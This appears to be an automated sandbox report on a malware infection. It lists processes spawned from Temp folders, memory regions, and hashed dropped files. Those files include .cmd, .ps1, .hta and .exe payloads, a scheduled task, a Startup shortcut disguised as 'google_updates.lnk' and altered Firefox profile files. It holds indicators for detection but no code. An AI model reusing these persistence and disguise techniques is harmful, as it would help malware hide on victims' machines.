"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\explorer.exe
explorer.exe
C:\Users\Admin\AppData\Local\Temp\10107790101\ce4pMzk.exe
"C:\Users\Admin\AppData\Local\Temp\10107790101\ce4pMzk.exe"
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Users\Admin\AppData\Local\Temp\10107800101\mAtJWNv.exe
"C:\Users\Admin\AppData\Local\Temp\10107800101\mAtJWNv.exe"
C:\Users\Admin\AppData\Local\Temp\10107800101\mAtJWNv.exe
"C:\Users\Admin\AppData\Local\Temp\10107800101\mAtJWNv.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 6740 -ip 6740
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 6740 -s 772
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
Network
Files
memory/2816-162-0x00000000008C0000-0x0000000000D7F000-memory.dmp
memory/2132-163-0x0000000005AD0000-0x0000000005AEE000-memory.dmp
memory/2132-164-0x0000000005AF0000-0x0000000005B3C000-memory.dmp
memory/2132-165-0x00000000071F0000-0x000000000786A000-memory.dmp
memory/2132-166-0x0000000005FF0000-0x000000000600A000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\10107450121\am_no.cmd
| MD5 | cedac8d9ac1fbd8d4cfc76ebe20d37f9 |
| SHA1 | b0db8b540841091f32a91fd8b7abcd81d9632802 |
| SHA256 | 5e951726842c371240a6af79d8da7170180f256df94eac5966c07f04ef4d120b |
| SHA512 | ce383ffef8c3c04983e752b7f201b5df2289af057e819cdf7310a55a295790935a70e6a0784a6fd1d6898564a3babab1ffcfbaa0cc0d36e5e042adeb3c293fa5 |
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | 556084f2c6d459c116a69d6fedcc4105 |
| SHA1 | 633e89b9a1e77942d822d14de6708430a3944dbc |
| SHA256 | 88cc4f40f0eb08ff5c487d6db341b046cc63b22534980aca66a9f8480692f3a8 |
| SHA512 | 0f6557027b098e45556af93e0be1db9a49c6416dc4afcff2cc2135a8a1ad4f1cf7185541ddbe6c768aefaf2c1a8e52d5282a538d15822d19932f22316edd283e |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 70595b5937369a2592a524db67e208d3 |
| SHA1 | d989b934d9388104189f365694e794835aa6f52f |
| SHA256 | be09b93a020e2e86a0b3c7c3f3d3e2c45f888944b1036df738385ede16f595c8 |
| SHA512 | edb412886187a2740eb7e284b16838bdd9f011aba1f4581f1fed25a86cdfe9b2ab4df863edeb3db6b072805439d57b10f3e0a1f2daabe1ee56db275ad2ad61e5 |
C:\Users\Admin\AppData\Local\Temp\installer.ps1
| MD5 | b6d611af4bea8eaaa639bbf024eb0e2d |
| SHA1 | 0b1205546fd80407d85c9bfbed5ff69d00645744 |
| SHA256 | 8cd3bf95cedcf3469d0044976c66cbf22cd2fecf21ae4f94986d7211d6ba9a2b |
| SHA512 | d8a4ec5bd986884959db3edfd48e2bf4c70ead436f81eab73b104aa0ff0f5dadfb6227cb2dab1f979f0dbb3aafbc1889ed571fb6e9444a09ae984b789314463d |
\??\c:\Users\Admin\AppData\Local\Temp\5wlhjbmh\5wlhjbmh.cmdline
| MD5 | 8b2f8b71178a4e99b5358e9e6ad2db5b |
| SHA1 | 26556abb464e42523c3f166ac55e5b74255b13ed |
| SHA256 | 90a396dab7e88da62546d17430e1915c06a631edc5ea965bc4e4c417ad31f8aa |
| SHA512 | 6512ef322237053ea3d69283fb3706fd4eebb0dd6b2015ed4cda5993ea34ec1b423e1503bdb08b560e5a1636926360cf6424d3a39ddeb5968d5299dfbaf3c16d |
\??\c:\Users\Admin\AppData\Local\Temp\5wlhjbmh\5wlhjbmh.0.cs
| MD5 | 1809fe3ba081f587330273428ec09c9c |
| SHA1 | d24ea2ea868ae49f46c8a7d894b7fda255ec1cd9 |
| SHA256 | d07a0c5fdf0862325608791f92273e0fc411c294f94d757f1ff0303ba5e03457 |
| SHA512 | e662420fc93a5cefd657f7701432924e6a06482ea147ad814d5e20b16b2f3c13ed2cc6b9caf24c22b7a5b24ad0aa1d216c5804c46d2250522cfc2cadc69f9e28 |
\??\c:\Users\Admin\AppData\Local\Temp\5wlhjbmh\CSCA8772FE477F3431A8E4EB01FFA7070FE.TMP
| MD5 | 948dca49ee090711abd80c3d94065e89 |
| SHA1 | 7c645e1d05b9cd46138a0d1936350b5d9cefbd6c |
| SHA256 | 31cdeebecb211e84d227d802fbd73fb3fe279a385c7742c29c3f7ab5b8f7bfbb |
| SHA512 | cf5a4a78f265945b22f4c02aedbe0af60035062b88b798deb01d58017a0ae6e179f852debff6886bd5ed72daeb3ab3cbd2be94f2f694d9e7f1bd33c299cf77c0 |
C:\Users\Admin\AppData\Local\Temp\RES4FE0.tmp
| MD5 | 311e2d48c8fa9c32173bace134fef0a3 |
| SHA1 | dd1daa6f91891161dae59ad89f204cb3ca369e98 |
| SHA256 | 107bfdf1ded7cb25f5c54fcdfd0473103a835a418392037b1323553701b88281 |
| SHA512 | 4badf8c1ca16eaee2b4cc879fd9cc65581ea7373163f18376b7a45fab0d5c6527a9578a23eec41bab7f55afda88eacc9ffcebff60adea7710b81fc1550b14fd2 |
memory/3928-213-0x000001E83B880000-0x000001E83B888000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\5wlhjbmh\5wlhjbmh.dll
| MD5 | 5f2dd6543692ba0c47a5503c71f3117f |
| SHA1 | b430927d369d1f31240db9bd8b600c6b055ea710 |
| SHA256 | 172670b2c3c564f84cd63df2eac138656846c707d7c589db553cd1393aa3f230 |
| SHA512 | fa2eabd5dd2e7c20907386520fb9818ad2697c6d0421dba5ca85466db41bbe1610c9f59d5cc00fc7e4ef997ff3107652e41384cda08e1db29bf3ed3b2082371e |
memory/3380-215-0x000000000D230000-0x000000000DAB3000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
| MD5 | 6195a91754effb4df74dbc72cdf4f7a6 |
| SHA1 | aba262f5726c6d77659fe0d3195e36a85046b427 |
| SHA256 | 3254495a5513b37a2686a876d0040275414699e7ce760e7b5ee05e41a54b96f5 |
| SHA512 | ed723d15de267390dc93263538428e2c881be3494c996a810616b470d6df7d5acfcc8725687d5c50319ebef45caef44f769bfc32e0dc3abd249dacff4a12cc89 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | f9f0c9fa8aa6bf9f467c23d27aa9cc44 |
| SHA1 | ff5c820bef43474569629fcebccee9817eb56b67 |
| SHA256 | 38990de0f663874fd9457d27473119ddec6f487a871f9b6188b46d19e67a4e95 |
| SHA512 | 5be9c9258acd47ab73a20bfea9b0f68001bd5a120afe06b634094943a9e809179061d108ea8a5feeffa1929c6b2e5bcc5b941d8cc193b98e045050bacd2267bf |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 79f0758190376147ab0e2adb0f3dbeb7 |
| SHA1 | bc6a39273f747a175f2d06e5b41fc6e830a072b9 |
| SHA256 | dff076712216c78e0876383bb682955c1011d91c0bdbcfd5ca7dd2dae5340293 |
| SHA512 | 18f0be0b8f6fb5ab32131e2e06799588c23e4d79473e1cc0a7a8fac46bd54214692c903c4bba7d25c111ab22980c2861c06e711272e7b80574fc208fc6589124 |
memory/2132-247-0x0000000006F90000-0x0000000007026000-memory.dmp
memory/2132-248-0x0000000006F20000-0x0000000006F42000-memory.dmp
memory/2132-249-0x0000000007E20000-0x00000000083C4000-memory.dmp
memory/4640-260-0x0000000000A00000-0x0000000000EBF000-memory.dmp
memory/1812-258-0x0000000000400000-0x0000000000840000-memory.dmp
memory/1812-257-0x0000000000400000-0x0000000000840000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 72a626e77455e405451d9741c79e65f4 |
| SHA1 | c55704e51c8e1d0463a27ea11d4ca31f44653f60 |
| SHA256 | 8ae2ccdcf432d61857c2722f95884fb8f3a478d43af4275193f738fc73e3d6c9 |
| SHA512 | d69db24884f74d8bef21ca097ff56e2fc8d71cd3186a6d8f431aefac42a07394d68783b46bec2518db664606b3ca9663e72b97df9acbee25ca63fc324404ccbc |
memory/4640-264-0x0000000000A00000-0x0000000000EBF000-memory.dmp
C:\Temp\4buU3vPam.hta
| MD5 | 39c8cd50176057af3728802964f92d49 |
| SHA1 | 68fc10a10997d7ad00142fc0de393fe3500c8017 |
| SHA256 | f685edf8437c0b505f5e366d8b1cb79e7770361cc4906240e7f8c8ad32c94e84 |
| SHA512 | cf563b2b5a3553acf3a91298936b904abf87620c2fc582bcdb45dec5d4b877bef5ae81feae4b741e1aee1a916e543b5f6914d9c494d2aa33bc6f15c6fc904cc6 |
memory/4236-271-0x0000000005DF0000-0x0000000006144000-memory.dmp
memory/4236-277-0x0000000006740000-0x000000000678C000-memory.dmp
memory/2816-278-0x00000000008C0000-0x0000000000D7F000-memory.dmp
memory/448-286-0x00000000005A0000-0x0000000000A5F000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\10107670101\ffd8234368.exe
| MD5 | 6afaf17077308fa040a656dc9e7d15ed |
| SHA1 | df7caf0b424dc62a60dfb64f585c111448c0c1e3 |
| SHA256 | 42c07ef38b42451a7b1717dff97266f615f2e5cedab1c5c5827dbe3e6d9f69b0 |
| SHA512 | cd459aa3bc462822a61a9f3e943aef48e9e332661c562c39bd92388be1544f034afef9f5f02315b5bce5419564ed4f3fb94e76efcb4422fdd7775aeb011be986 |
memory/448-297-0x00000000005A0000-0x0000000000A5F000-memory.dmp
memory/1936-305-0x00000000008B0000-0x00000000012BD000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\10107680101\cc8fa31301.exe
| MD5 | c83ea72877981be2d651f27b0b56efec |
| SHA1 | 8d79c3cd3d04165b5cd5c43d6f628359940709a7 |
| SHA256 | 13783c2615668fba4a503cbefdc18f8bc3d10d311d8dfe12f8f89868ed520482 |
| SHA512 | d212c563fdce1092d6d29e03928f142807c465ecaaead4fe9d8949b6f36184b8d067a830361559d59fc00d3bbe88feda03d67b549d54f0ec268e9e75698c1dd0 |
memory/4784-323-0x0000000000320000-0x0000000000398000-memory.dmp
memory/1032-326-0x0000000000400000-0x0000000000465000-memory.dmp
memory/1032-328-0x0000000000400000-0x0000000000465000-memory.dmp
memory/1812-329-0x0000000000400000-0x0000000000840000-memory.dmp
memory/2816-330-0x00000000008C0000-0x0000000000D7F000-memory.dmp
memory/1936-331-0x00000000008B0000-0x00000000012BD000-memory.dmp
memory/1936-332-0x00000000008B0000-0x00000000012BD000-memory.dmp
memory/4236-333-0x0000000000400000-0x000000000042F000-memory.dmp
memory/4912-334-0x00007FF6D5BB0000-0x00007FF6D6474000-memory.dmp
memory/4912-335-0x00007FF6D5BB0000-0x00007FF6D6474000-memory.dmp
memory/4912-343-0x00007FF6D5BB0000-0x00007FF6D6474000-memory.dmp
memory/4912-344-0x0000025156E00000-0x0000025156E20000-memory.dmp
memory/4912-349-0x00007FF6D5BB0000-0x00007FF6D6474000-memory.dmp
memory/4912-347-0x00007FF6D5BB0000-0x00007FF6D6474000-memory.dmp
memory/4912-346-0x00007FF6D5BB0000-0x00007FF6D6474000-memory.dmp
memory/4912-348-0x00007FF6D5BB0000-0x00007FF6D6474000-memory.dmp
memory/4912-345-0x00007FF6D5BB0000-0x00007FF6D6474000-memory.dmp
memory/4236-350-0x0000000000400000-0x000000000042F000-memory.dmp
memory/1936-352-0x00000000008B0000-0x00000000012BD000-memory.dmp
memory/1812-355-0x0000000000400000-0x0000000000840000-memory.dmp
memory/4236-357-0x0000000010000000-0x000000001001C000-memory.dmp
memory/2816-361-0x00000000008C0000-0x0000000000D7F000-memory.dmp
memory/4912-363-0x00007FF6D5BB0000-0x00007FF6D6474000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\APYB1149\service[1].htm
| MD5 | cfcd208495d565ef66e7dff9f98764da |
| SHA1 | b6589fc6ab0dc82cf12099d1c2d40ab994e8410c |
| SHA256 | 5feceb66ffc86f38d952786c6d696c79c2dbc239dd4e91b46729d73a27fb57e9 |
| SHA512 | 31bca02094eb78126a517b206a88c73cfa9ec6f704c7030d18212cace820f025f00bf0ea68dbf3f3a5436ca63b53bf7bf80ad8d5de7d8359d0b7fed9dbc3ab99 |
memory/4760-371-0x0000000000400000-0x0000000000840000-memory.dmp
memory/1812-370-0x0000000000400000-0x0000000000840000-memory.dmp
memory/1612-373-0x00000000008C0000-0x0000000000D7F000-memory.dmp
C:\Windows\Tasks\Test Task17.job
| MD5 | e98b04b624a464b1c29c568ce5c01d80 |
| SHA1 | 0e2dbfea3364a1fe6e0a71cc73a9c816badf8ebc |
| SHA256 | e1af114b172e3e860fffedc2dd9845bd9c55407915e2e3fa2178b93741e2f1ef |
| SHA512 | 3c62665d36228919f0af16328c1fe20a1f44f7bb15d6c20fe52ddb20f4c300516c10096830790fdf77abe6bc1c36308da1f5f3b7499bc9de1c346c61a7b2d45c |
memory/1612-376-0x00000000008C0000-0x0000000000D7F000-memory.dmp
memory/2816-378-0x00000000008C0000-0x0000000000D7F000-memory.dmp
memory/4912-380-0x00007FF6D5BB0000-0x00007FF6D6474000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\10107690101\8e014fc6f7.exe
| MD5 | 5d153f73ce1b6a907cf87ddb04ba12b2 |
| SHA1 | bfda9ee8501ae0ca60f8e1803efea482085bf699 |
| SHA256 | 2af376f6a5d706982e3ac08f54d737c4c203bdc2c2c1cbf5f9fc9d4a3a775b2c |
| SHA512 | 0f6ef7ff7db227bec5d2a1dcef461313cde66b5ec38f5efd377e533ef15d87eb4aef6cf387ee7c7b63d1142a883bb18577f97dec0dcd818b93891e87f499c102 |
memory/2644-396-0x00000000002D0000-0x0000000000F21000-memory.dmp
memory/4760-398-0x0000000000400000-0x0000000000840000-memory.dmp
memory/1812-399-0x0000000000400000-0x0000000000840000-memory.dmp
memory/4760-400-0x0000000000400000-0x0000000000840000-memory.dmp
memory/2816-402-0x00000000008C0000-0x0000000000D7F000-memory.dmp
memory/4912-404-0x00007FF6D5BB0000-0x00007FF6D6474000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\10107700101\82ce3de40e.exe
| MD5 | 8538c195a09066478922511ea1a02edf |
| SHA1 | 15e8910df845d897b4bb163caef4c6112570855b |
| SHA256 | d5008972ddedb199731712f9fef3b3aa5a5cd666b600136a9da84656739d4e96 |
| SHA512 | 60b2c66006b226140f7bf50c94c65088081b311ee92c6dea376a1349ff2380e0ce053a84b2df3be8a54bf7f7bb76f1add8417f4f1bf2fb0681e008cbd5b1725c |
memory/1032-419-0x0000000000F50000-0x00000000013FB000-memory.dmp
memory/2644-420-0x00000000002D0000-0x0000000000F21000-memory.dmp
memory/2644-443-0x00000000002D0000-0x0000000000F21000-memory.dmp
C:\Users\Admin\Desktop\YCL.lnk
| MD5 | f63714e3ad1cc2dbf8465ca21b151566 |
| SHA1 | e294fcaedd5f255ae930ad78509e57001369a915 |
| SHA256 | 838cc8e53c2ff83ce4ec76dac7679b9a888cd7923b9f60ff9194cad29283da25 |
| SHA512 | 05e85a65ba2a618630fa850f53d555facd0ff3979376306b3a044b30f7524fd1cba3319a759b2044aedb1ac1e6127bab0ed27c141ea816c70b1143410ff375bf |
C:\Users\Admin\AppData\Local\Temp\BWee4D3AYfw9GE1K6DFDSwdJt\Y-Cleaner.exe
| MD5 | f49d1aaae28b92052e997480c504aa3b |
| SHA1 | a422f6403847405cee6068f3394bb151d8591fb5 |
| SHA256 | 81e31780a5f2078284b011c720261797eb8dd85e1b95a657dbce7ac31e9df1f0 |
| SHA512 | 41f715eea031fd8d7d3a22d88e0199277db2f86be73f830819288c0f0665e81a314be6d356fdc66069cb3f2abf0dd02aaa49ac3732f3f44a533fcec0dfd6f773 |
memory/2644-467-0x00000000002D0000-0x0000000000F21000-memory.dmp
memory/4624-466-0x0000000000400000-0x000000000042F000-memory.dmp
memory/1812-468-0x0000000000400000-0x0000000000840000-memory.dmp
memory/4912-470-0x00007FF6D5BB0000-0x00007FF6D6474000-memory.dmp
memory/4912-471-0x00007FF6D5BB0000-0x00007FF6D6474000-memory.dmp
memory/4760-473-0x0000000000400000-0x0000000000840000-memory.dmp
memory/1032-475-0x0000000000F50000-0x00000000013FB000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\10107710101\250c1f6b4d.exe
| MD5 | 2a48e7b047c5ff096c6dce52d4f26dbb |
| SHA1 | e0d61e10b27131b1c34ade44d1a2117afd2cf099 |
| SHA256 | 42642893c6a6af226aab5b2cce0875e7affebf7d1001146ddd90234d4c01492d |
| SHA512 | 75965d3aa7cda41ecc11f87b1ac2b12283d58650f5b96f2af560aff859ca74c0c0cb26dfc765b4d8318291d8f89fdbb338fb71ddf3f4b63389aedb5e2106165a |
memory/2456-496-0x0000000000AB0000-0x0000000000DC4000-memory.dmp
memory/2816-497-0x00000000008C0000-0x0000000000D7F000-memory.dmp
memory/4912-499-0x00007FF6D5BB0000-0x00007FF6D6474000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\10107720101\860be6c356.exe
| MD5 | 338a31056b3b81d48a292a7bf9af67c7 |
| SHA1 | f5061e3583ba604b25e316f12fc58f40238d44b4 |
| SHA256 | cd1c085a07dc81e4305c2b9ee57e5c0433858c97cb20b1743cf44931c431ccea |
| SHA512 | 5bc7823cbd1ab6fa963df8f152d8b6de56af41159f3a736d147f1e5b4dcba3007319e2d2fb13e97f1e8b3cce3ab0d17e31d541be1ab53f8bd05a42316a940abc |
memory/4432-514-0x0000000000D50000-0x00000000013D7000-memory.dmp
memory/4432-518-0x0000000000D50000-0x00000000013D7000-memory.dmp
memory/4760-520-0x0000000000400000-0x0000000000840000-memory.dmp
memory/2456-528-0x0000000000AB0000-0x0000000000DC4000-memory.dmp
memory/3816-525-0x0000000000F30000-0x00000000013EF000-memory.dmp
memory/2456-524-0x0000000000AB0000-0x0000000000DC4000-memory.dmp
memory/3816-530-0x0000000000F30000-0x00000000013EF000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\10107730101\07d2efa8fe.exe
| MD5 | c0caf5a901b162b6792eab9697827b5d |
| SHA1 | d078ba4ad104c40bf5f2c8afda1cbdf4afc55a84 |
| SHA256 | 28c182baea1726c3e851405b13f130e02817099758abab86ca9cdc3607b9f89f |
| SHA512 | 3fba4eb7a2bc21fc24a6e29495e598efc5f208db030b13de8af43a392a93e3a920e4e8e4b68e10d4dc4a0e8779401ca738172ca9cba2ddc2246854c41a8a58a5 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\o7z8hwau.default-release\AlternateServices.bin
| MD5 | 81ee27532211182c34e9c0246a85b0da |
| SHA1 | 07843f9d9db85ea4d887818daf242599d37af358 |
| SHA256 | 4f8f022b76ac46855ab82930bd2e1882fa866336bf98993ecbba41c4b3a61a88 |
| SHA512 | b320052fd5dafeaa8a80e5cad7b4d9314c7b0d15161955bcdd23a247fd8921553d8b668449cb9dfde10bcc74f7b265db0653f883d2fc03bfd6e57b9a1dc2929d |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\o7z8hwau.default-release\datareporting\glean\pending_pings\a1299b2b-d5c1-40fe-b2e5-e91f2d7e139b
| MD5 | bafa8b3ea120ee6a0e860799009fcf7e |
| SHA1 | 86b328433db67f6d38ca4a763a1f014c226e60a0 |
| SHA256 | 900f9ff0eaa5ab4a96a069a9b2689d1285bd250d6098740bc9f45f4f83549f3b |
| SHA512 | c2eec21a186504b899671bd3aa2b27e4d9f78c6e836b329fe2efe06bb4e8a51eaa64fc7b14a1543e04e115eef1642b7fd74e328fff4ed04c1344eff8b581f843 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\o7z8hwau.default-release\datareporting\glean\db\data.safe.tmp
| MD5 | 404002aafe8163f795edaf2cbe471b27 |
| SHA1 | 661f56ff4d3ecfa2ffa8fb6510c2169f6243d284 |
| SHA256 | a47aaeb46c580900d89949acf08c973fbec44a06e33db88fd57be3bae9a1e482 |
| SHA512 | 5e2d6a4885f16fda6c3d23cbd589941cb22be938c27eb9dcd715a650ff2de232fa001f942d9a6d28b2df8392037809f21992bd2f06a3eb385302be5943551ffa |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\o7z8hwau.default-release\datareporting\glean\db\data.safe.tmp
| MD5 | 2d38ae9732a366ebccdc6c2a67d88898 |
| SHA1 | cef963367e7ee5de5fdec8a545e6ccd72043ae4d |
| SHA256 | e1b5673474f3236cfa8d26802979d1570306c509d359336dbf49b1aeb3beb96b |
| SHA512 | 6283dd7be5c7bcf60a3e76e98519c7876fc48456b88cce09511640a307f6f5ee97762668d027cba39c7173feb20b67b8c6d793a6ec3c92ddd313a9a508baa303 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\o7z8hwau.default-release\datareporting\glean\pending_pings\d9d3bfe7-b788-415a-a9fe-99948fc4a8d9
| MD5 | 24e9911a2a15c19423d39916b27eab90 |
| SHA1 | 97ef9de317c35b69c804b46f9b26b12228338fb1 |
| SHA256 | f00a640a88c6bef7a914075287109e7583a1dd736de829fd3e25abe7d0e8e0f4 |
| SHA512 | dc04ca538f1e7b095519eb797a1ce50076734044f3cb660fdc0db14c5bbb6e7052ac2b91c68f57d1edccb592e8614ec12fa0d62e63758a699d0d6c97850cdf9c |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\o7z8hwau.default-release\datareporting\glean\pending_pings\60c1d7d6-a364-4369-b78d-ad1a661f4b6b
| MD5 | 84c500c830911598ab5eee127e9f467d |
| SHA1 | 61846eede4ce7fe445097cb13f17cb12c43706de |
| SHA256 | 3dfdc57ac381a9d99f33203deafb77edf2eab4c4058f83df34c61e6d3de03995 |
| SHA512 | ce77ab6f0cb4a298a9a9e3b328e309d62dfedf8e7278271acc23d278fc93f333a856729b98f703af32dbbe89732a4eddb2bfff0a253d5fe1032d926b483c708b |
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\google_updates.lnk
| MD5 | 7ab39bc35195b01db0eb09e6452b70f7 |
| SHA1 | e10c2c3f3c293fc28250293f383076a31da948bb |
| SHA256 | 8eca63b166c7812902bfb6ff78a5874aee74cc2b7e7fcd096a3d2aae78b78160 |
| SHA512 | 5f880a2225e07333a6dd708fe2388350e3316cdb44f7445741cae2e9ff698c2957518a33ddfb429a35403c0da833dcb7b97d44d1234a2d33c0d8ecb2064d8a26 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\o7z8hwau.default-release\datareporting\glean\db\data.safe.tmp
| MD5 | 2c5e426ef34ae0ddb2b4ebdaa8184ae8 |
| SHA1 | 0e526a5326f68c9e8d1a6c7e8dbe70dd17daab95 |
| SHA256 | 40211d6623b8fd504f1b279afccc9bec90ae18bb4091a8c867adfb6437d9a5b8 |
| SHA512 | c388e9a8d1e4a8b7df6d13c9de8f8aeca7374112a97e65aefefa3f3f656cfd19504c6791eee31a9c317dd715c763bb3bfbb61c1ce2a126e60824a05f540a84f9 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\o7z8hwau.default-release\AlternateServices.bin
| MD5 | f39d49c4f27e85ed0c82b9c6223aacdd |
| SHA1 | 438f1abe9f9ca52f9319644fbcd33075ca09e636 |
| SHA256 | fc6291f43501d87d078966f98a9f459ab1e903f0d04164a78dc0568fdd2321de |
| SHA512 | 08f97868029365416824a99fde1df74abccd5a6e250dd22abdeac8cf93fd1e978e6de8ce1534e4410c7e1563d71491dc96e4a07a2834cdc32f0b2565057ec4bc |
C:\Users\Admin\AppData\Local\Temp\10107740101\91ff33b7b2.exe
| MD5 | 8043b20e32ff2f0c75e9a3eed0c4bf07 |
| SHA1 | 5464aa1bc2a91c64cd8c4cbbb6970e8189c158a3 |
| SHA256 | 69a487512dfb97f08d068d0f9dd3924f42bef46bddd79112cb206b00fc16713e |
| SHA512 | 35639c6aad3dd25f606ca72ad108f774b083fa62677772242d357d59add9bba1dc85532d58ae67277d90c04dd4a5189548ca331fe93ee086c31cacbf11b8a18c |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\o7z8hwau.default-release\prefs.js
| MD5 | dfb0400d1a77ffb15cde456b2cdeec0f |
| SHA1 | fd4af4a023e325dcb5c4c5360805aa1c2217eeda |
| SHA256 | 1007d8d31584a29169e6704d524ca0c388692ebe64ca720d7a9296b42b32cb6a |
| SHA512 | a1fe02e61d35a1d8fe5c8e2c214808c1f84c96f986bd52717163a4dad8899a7878257d92cc4f71166872a0d52149251f8cb53c7392c8a9b28a6e364cfe7fae25 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\o7z8hwau.default-release\prefs-1.js
| MD5 | f1a33e2276c5393129593c774f09be6f |
| SHA1 | 56d742a549f8ac2e6c135c9d8dba15360a3983c3 |
| SHA256 | a771646130c498cce69f92d8b1aaf1219a6e404f2927ddd650e46b08271c023c |
| SHA512 | 8076340769a114a1afccf202e3c420f88c862af61f5345fcaeb05d5907f88c0a97f469bebcda206888ee2f3cbe8ff35fdb3dc7c61bf5cbb5793e90a0b2053acc |
memory/5292-895-0x0000000000CB0000-0x0000000001108000-memory.dmp
memory/5292-907-0x0000000000CB0000-0x0000000001108000-memory.dmp
memory/5292-908-0x0000000000CB0000-0x0000000001108000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\10107750101\zY9sqWs.exe
| MD5 | 2bb133c52b30e2b6b3608fdc5e7d7a22 |
| SHA1 | fcb19512b31d9ece1bbe637fe18f8caf257f0a00 |
| SHA256 | b8e02f2bc0ffb42e8cf28e37a26d8d825f639079bf6d948f8debab6440ee5630 |
| SHA512 | 73229885f8bf4aace4671b819a8487f36acb7878cd309bdf80b998b0a63584f3063364d192b1fc26fa71b9664908fe290a00f6898350c30f40d5f2a2d2efe51f |
memory/5292-983-0x0000000000CB0000-0x0000000001108000-memory.dmp
memory/5292-999-0x0000000000CB0000-0x0000000001108000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\10107770101\v6Oqdnc.exe
| MD5 | 6006ae409307acc35ca6d0926b0f8685 |
| SHA1 | abd6c5a44730270ae9f2fce698c0f5d2594eac2f |
| SHA256 | a5fa1579a8c1a1d4e89221619d037b6f8275f34546ed44a020f5dfcee3710f0b |
| SHA512 | b2c47b02c972f63915e2e45bb83814c7706b392f55ad6144edb354c7ee309768a38528af7fa7aeadb5b05638c0fd55faa734212d3a657cd08b7500838135e718 |
memory/6108-1038-0x0000000000DF0000-0x000000000128B000-memory.dmp
